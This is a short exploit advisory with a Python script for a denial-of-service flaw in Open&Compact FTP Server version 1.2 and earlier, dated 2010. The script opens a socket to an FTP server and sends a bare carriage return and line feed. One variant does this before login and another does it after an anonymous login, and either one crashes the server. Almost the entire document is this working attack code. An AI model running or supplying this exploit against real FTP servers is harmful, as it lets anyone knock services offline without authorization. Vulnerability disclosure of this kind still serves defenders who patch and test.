Open and Compact FTP Server version 1.2 suffers from a denial of service vulnerability.
8ea9f2c7bebd4ac4e981c04038d3152c116e290318ce180415ce2099a0b9808f
# Exploit Title: Open&Compact Ftp Server <= 1.2 Denial Of Service
# Date: June 12, 2010
# Author: Serge Gorbunov
# Software Link: https://sourceforge.net/projects/open-ftpd/
# Version: <= 1.2
# Tested on: Windows 7, Windows XP SP3
#!/usr/bin/python
# This exploits allows to crash open ftpd server at any time simply
# by sending '\r\n' into the socket.
# You can send '\r\n' before authentication or after authentication
# and the server will always crash.
# Below are two examples of crashing the server:
# Call either crashServerBeforeAuth or crashServerAfterAuth from
# the main function.
import socket
def main():
s.connect( ( "127.0.0.1", 21 ) )
crashServerBeforeAuth()
# crashServerAfterAuth()
s.close()
def crashServerBeforeAuth():
print s.recv( 512 )
s.send( '\r\n' )
def crashServerAfterAuth():
print s.recv( 512 )
s.send('USER anonymous\r\n' )
print s.recv( 512 )
s.send('PASS anonymous\r\n' )
print s.recv( 512 )
s.send( '\r\n' )
if __name__ == "__main__":
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
main()